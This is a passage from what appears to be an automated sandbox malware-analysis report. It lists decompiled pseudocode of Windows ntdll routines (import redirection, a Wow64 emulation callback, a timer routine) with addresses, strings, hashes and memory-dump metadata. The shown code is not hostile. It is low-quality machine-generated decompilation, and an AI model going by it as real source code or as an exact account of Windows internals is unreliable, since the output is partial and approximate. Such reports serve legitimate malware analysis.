					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                                                                                              0x1d7c43e2
                                                                                                                              0x1d7c43e5
                                                                                                                              0x1d7c43e7
                                                                                                                              0x1d7c43f3
                                                                                                                              0x1d7c43fa
                                                                                                                              0x1d7c4401
                                                                                                                              0x1d7c440b
                                                                                                                              0x1d7c440f
                                                                                                                              0x1d7c4414
                                                                                                                              0x1d7c4418
                                                                                                                              0x1d7c4420
                                                                                                                              0x1d7c4424
                                                                                                                              0x1d7c442e
                                                                                                                              0x1d7c442e
                                                                                                                              0x1d7c4426
                                                                                                                              0x1d7c4426
                                                                                                                              0x1d7c4426
                                                                                                                              0x1d7c4424
                                                                                                                              0x1d7c4433
                                                                                                                              0x1d7c445e
                                                                                                                              0x1d7c4443
                                                                                                                              0x1d7c4445
                                                                                                                              0x1d7c444b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44c0
                                                                                                                              0x1d7c446a
                                                                                                                              0x1d7c446f
                                                                                                                              0x1d7c4471
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c4473
                                                                                                                              0x1d7c4479
                                                                                                                              0x1d7c447b
                                                                                                                              0x1d7c44d4
                                                                                                                              0x1d7c44d4
                                                                                                                              0x1d7c44db
                                                                                                                              0x1d7c44de
                                                                                                                              0x1d7c44e6
                                                                                                                              0x1d7c44e9
                                                                                                                              0x1d7c44ef
                                                                                                                              0x1d7c44f9
                                                                                                                              0x1d7c44fc
                                                                                                                              0x1d7c44ff
                                                                                                                              0x1d7c4502
                                                                                                                              0x1d7c451e
                                                                                                                              0x1d7c4523
                                                                                                                              0x1d7c44c9
                                                                                                                              0x1d7c44d1
                                                                                                                              0x1d7c44d1
                                                                                                                              0x1d7c4489
                                                                                                                              0x1d7c448f
                                                                                                                              0x1d7c4491
                                                                                                                              0x1d7c4493
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c4495
                                                                                                                              0x1d7c4498
                                                                                                                              0x1d7c449a
                                                                                                                              0x1d7c449c
                                                                                                                              0x1d7c44b8
                                                                                                                              0x1d7c44bb
                                                                                                                              0x1d7c44bb
                                                                                                                              0x1d7c44be
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44b2
                                                                                                                              0x1d7c44b4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44b6
                                                                                                                              0x1d7c44b6
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44b8
                                                                                                                              0x1d7c449e
                                                                                                                              0x1d7c44a0
                                                                                                                              0x1d7c44a2
                                                                                                                              0x1d7c44a4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44a6
                                                                                                                              0x1d7c44a6
                                                                                                                              0x1d7c44a6
                                                                                                                              0x1d7c44a8
                                                                                                                              0x1d7c44aa
                                                                                                                              0x1d7c44ac
                                                                                                                              0x1d7c44ac
                                                                                                                              0x1d7c44b0
                                                                                                                              0x1d7c44c4
                                                                                                                              0x00000000
                                                                                                                              0x1d7c44c4
                                                                                                                              0x1d7c444d
                                                                                                                              0x1d7c4450
                                                                                                                              0x1d7c4450
                                                                                                                              0x1d7c4452
                                                                                                                              0x1d7c445c
                                                                                                                              0x1d7c445c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c445c
                                                                                                                              0x1d7c4454
                                                                                                                              0x1d7c4456
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c4458
                                                                                                                              0x00000000
                                                                                                                              0x1d7c4458
                                                                                                                              0x1d7c4447
                                                                                                                              0x00000000
                                                                                                                              0x1d7c4447
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D7C4508
                                                                                                                              • LdrpCheckRedirection, xrefs: 1D7C450F
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 1D7C4519
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                                              • Opcode ID: 215d3fce6a8b78b0076eb2368fd44de52167d0c3aa1b972d293ae4b00a73fca4
                                                                                                                              • Instruction ID: f00f66b5cf9d3f14cc64c63a0ae1fc0edea16c806004c76cc02dd3e3112624b8
                                                                                                                              • Opcode Fuzzy Hash: 215d3fce6a8b78b0076eb2368fd44de52167d0c3aa1b972d293ae4b00a73fca4
                                                                                                                              • Instruction Fuzzy Hash: 7541B0766046139FCB21CF58D840A6677E4BF48B78F264A5AEC9897252D730FA00CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C5B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 31%
                                                                                                                              			E1D7C5B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E1D75DDA0(0, 0, 0x1d711b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E1D75CF00(_t36, _t38, _v8, 0x1d711b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E1D75CF00(_t36, _t38, _v8, 0x1d711b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E1D75CF00(_t36, _t38, _v8, 0x1d711b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x1d8391e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x1d8391e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x1d8391e0(_t40);
								_v20();
							}
						}
					}
				}
				return E1D75CD80(_t36, _t43);
			}












                                                                                                                              0x1d7c5b90
                                                                                                                              0x1d7c5ba6
                                                                                                                              0x1d7c5bad
                                                                                                                              0x1d7c5c51
                                                                                                                              0x1d7c5c51
                                                                                                                              0x1d7c5bb7
                                                                                                                              0x1d7c5bcd
                                                                                                                              0x1d7c5bd2
                                                                                                                              0x1d7c5be8
                                                                                                                              0x1d7c5bed
                                                                                                                              0x1d7c5c03
                                                                                                                              0x1d7c5c05
                                                                                                                              0x1d7c5c0f
                                                                                                                              0x1d7c5c18
                                                                                                                              0x1d7c5c1c
                                                                                                                              0x1d7c5c31
                                                                                                                              0x1d7c5c37
                                                                                                                              0x1d7c5c3a
                                                                                                                              0x1d7c5c3e
                                                                                                                              0x1d7c5c44
                                                                                                                              0x1d7c5c44
                                                                                                                              0x1d7c5c47
                                                                                                                              0x1d7c5c03
                                                                                                                              0x1d7c5be8
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Wow64 Emulation Layer
                                                                                                                              • API String ID: 3446177414-921169906
                                                                                                                              • Opcode ID: 73c3f09767f5299a11b60d7eeebb9b7ffde7eaf243bef7c3cd01cd3832099b7a
                                                                                                                              • Instruction ID: 50bea612e81c41118b742c6474b28c26bf9667271fff0679003c7e555292584c
                                                                                                                              • Opcode Fuzzy Hash: 73c3f09767f5299a11b60d7eeebb9b7ffde7eaf243bef7c3cd01cd3832099b7a
                                                                                                                              • Instruction Fuzzy Hash: 36214A7A90011EFFEB119AA48D88DFF7B7DEF482A9F010155FA05A6111E730EE01DB22
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E1D76EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1d81c610);
				E1D797C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1D752330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1D7524D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1d8367f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1d8367f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1d8367f0; // 0x0
							_t309 =  *0x1d8367f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x1abf6d8
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E1D76F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1d8391e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1ac0d3c
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1D7524D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1D752330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1D752330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1D7524D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1D752330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1ac0d3c
										E1D7CC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1ac0d3c
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1ac0d3c
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1D76F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x1abf6d8
									_t86 = _t255 + 0x10; // 0x1ac0d3c
									 *0x1d8391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1d8391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1d8391e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1D753C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1ac0d3c
										_t250 = E1D7CC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1D76F1DB(_t250);
									_t228 = E1D76F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x1ac0d3c
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}
































                                                                                                                              0x1d76ee48
                                                                                                                              0x1d76ee4a
                                                                                                                              0x1d76ee4f
                                                                                                                              0x1d76ee54
                                                                                                                              0x1d76ee56
                                                                                                                              0x1d76ee5b
                                                                                                                              0x1d76ee60
                                                                                                                              0x1d76ee63
                                                                                                                              0x1d76ee66
                                                                                                                              0x1d76ee68
                                                                                                                              0x1d76ee70
                                                                                                                              0x1d76ee73
                                                                                                                              0x1d76ee76
                                                                                                                              0x1d76ee79
                                                                                                                              0x1d76ee80
                                                                                                                              0x1d76ee85
                                                                                                                              0x1d76ee88
                                                                                                                              0x00000000
                                                                                                                              0x1d76ee8b
                                                                                                                              0x1d76ee93
                                                                                                                              0x1d76ee98
                                                                                                                              0x1d76ee9f
                                                                                                                              0x1d76eeac
                                                                                                                              0x1d76eeb8
                                                                                                                              0x1d76eeb8
                                                                                                                              0x1d76eebe
                                                                                                                              0x1d76eec6
                                                                                                                              0x1d76eec9
                                                                                                                              0x1d76eec9
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eece
                                                                                                                              0x1d76eed3
                                                                                                                              0x1d76eed6
                                                                                                                              0x1d76eedb
                                                                                                                              0x1d76eee0
                                                                                                                              0x1d76eee6
                                                                                                                              0x1d76eeee
                                                                                                                              0x1d76eeee
                                                                                                                              0x1d76eef0
                                                                                                                              0x1d76eef4
                                                                                                                              0x1d76eef6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f1dc
                                                                                                                              0x1d76f1dc
                                                                                                                              0x1d76eefc
                                                                                                                              0x1d76eefc
                                                                                                                              0x1d76ef01
                                                                                                                              0x1d76ef03
                                                                                                                              0x1d76ef06
                                                                                                                              0x1d76ef09
                                                                                                                              0x1d76ef0c
                                                                                                                              0x1d76ef0f
                                                                                                                              0x1d76ef0f
                                                                                                                              0x1d76ef16
                                                                                                                              0x1d76ef16
                                                                                                                              0x1d76ef1b
                                                                                                                              0x1d76ef20
                                                                                                                              0x1d76ef26
                                                                                                                              0x1d76ef29
                                                                                                                              0x1d76ef2c
                                                                                                                              0x1d76ef2c
                                                                                                                              0x1d76ef36
                                                                                                                              0x1d76ef36
                                                                                                                              0x1d76ef3b
                                                                                                                              0x1d76ef40
                                                                                                                              0x1d76ef46
                                                                                                                              0x1d76ef4c
                                                                                                                              0x1d76ef54
                                                                                                                              0x1d76ef57
                                                                                                                              0x1d76ef59
                                                                                                                              0x1d76ef60
                                                                                                                              0x1d76ef63
                                                                                                                              0x1d76ef63
                                                                                                                              0x1d76ef66
                                                                                                                              0x1d76ef69
                                                                                                                              0x1d76ef6c
                                                                                                                              0x1d76f113
                                                                                                                              0x1d76f113
                                                                                                                              0x1d76f115
                                                                                                                              0x1d76f122
                                                                                                                              0x1d76f127
                                                                                                                              0x1d76f12b
                                                                                                                              0x1d7afe64
                                                                                                                              0x1d7afe6a
                                                                                                                              0x1d7afe6a
                                                                                                                              0x00000000
                                                                                                                              0x1d76f12b
                                                                                                                              0x1d76ef72
                                                                                                                              0x1d76ef74
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76ef7a
                                                                                                                              0x1d76ef7d
                                                                                                                              0x1d76ef7d
                                                                                                                              0x1d76ef7d
                                                                                                                              0x1d76ef81
                                                                                                                              0x1d76f144
                                                                                                                              0x1d76f144
                                                                                                                              0x1d76f14a
                                                                                                                              0x1d7afd20
                                                                                                                              0x1d7afd23
                                                                                                                              0x1d76ef90
                                                                                                                              0x1d76ef90
                                                                                                                              0x1d76ef93
                                                                                                                              0x1d7afd2e
                                                                                                                              0x1d7afd31
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7afd37
                                                                                                                              0x1d7afd45
                                                                                                                              0x1d7afd4b
                                                                                                                              0x1d7afd4b
                                                                                                                              0x1d7afd4e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7afd54
                                                                                                                              0x1d7afd3c
                                                                                                                              0x1d7afd3f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7afd3f
                                                                                                                              0x1d76ef99
                                                                                                                              0x1d76ef99
                                                                                                                              0x1d76ef9c
                                                                                                                              0x1d76f1a6
                                                                                                                              0x1d76f1a9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f1af
                                                                                                                              0x1d76efa2
                                                                                                                              0x1d76efa2
                                                                                                                              0x1d76efa5
                                                                                                                              0x1d76efab
                                                                                                                              0x1d76efae
                                                                                                                              0x1d76efb4
                                                                                                                              0x1d76efba
                                                                                                                              0x1d76efc0
                                                                                                                              0x1d76efc6
                                                                                                                              0x1d76efcc
                                                                                                                              0x1d76efd8
                                                                                                                              0x1d76efde
                                                                                                                              0x1d76efe1
                                                                                                                              0x1d76efe7
                                                                                                                              0x1d76efe9
                                                                                                                              0x1d76efec
                                                                                                                              0x1d76eff3
                                                                                                                              0x1d76eff8
                                                                                                                              0x1d76effa
                                                                                                                              0x1d76efff
                                                                                                                              0x1d76f002
                                                                                                                              0x1d76f008
                                                                                                                              0x1d76f00a
                                                                                                                              0x1d76f15d
                                                                                                                              0x1d76f164
                                                                                                                              0x1d76f165
                                                                                                                              0x1d76f168
                                                                                                                              0x1d76f16b
                                                                                                                              0x1d76f16e
                                                                                                                              0x1d76f170
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f176
                                                                                                                              0x1d76f17a
                                                                                                                              0x1d76f1c8
                                                                                                                              0x1d76f1cf
                                                                                                                              0x1d76f1d0
                                                                                                                              0x1d76f1d3
                                                                                                                              0x00000000
                                                                                                                              0x1d76f1d3
                                                                                                                              0x1d76f17c
                                                                                                                              0x1d76f105
                                                                                                                              0x1d76f105
                                                                                                                              0x1d76f108
                                                                                                                              0x1d76f10a
                                                                                                                              0x1d76f1b7
                                                                                                                              0x1d76f1b7
                                                                                                                              0x1d76f110
                                                                                                                              0x00000000
                                                                                                                              0x1d76f110
                                                                                                                              0x1d76f010
                                                                                                                              0x1d76f010
                                                                                                                              0x1d76f013
                                                                                                                              0x1d76f0a2
                                                                                                                              0x1d76f0a2
                                                                                                                              0x1d76f0a6
                                                                                                                              0x1d76f186
                                                                                                                              0x1d76f186
                                                                                                                              0x1d76f0ac
                                                                                                                              0x1d76f0b0
                                                                                                                              0x1d7afe56
                                                                                                                              0x1d7afe56
                                                                                                                              0x1d76f103
                                                                                                                              0x1d76f103
                                                                                                                              0x00000000
                                                                                                                              0x1d76f103
                                                                                                                              0x1d76f0bc
                                                                                                                              0x1d76f0c3
                                                                                                                              0x1d76f0c4
                                                                                                                              0x1d76f0c7
                                                                                                                              0x1d76f0ce
                                                                                                                              0x1d7afe35
                                                                                                                              0x1d7afe35
                                                                                                                              0x1d7afe39
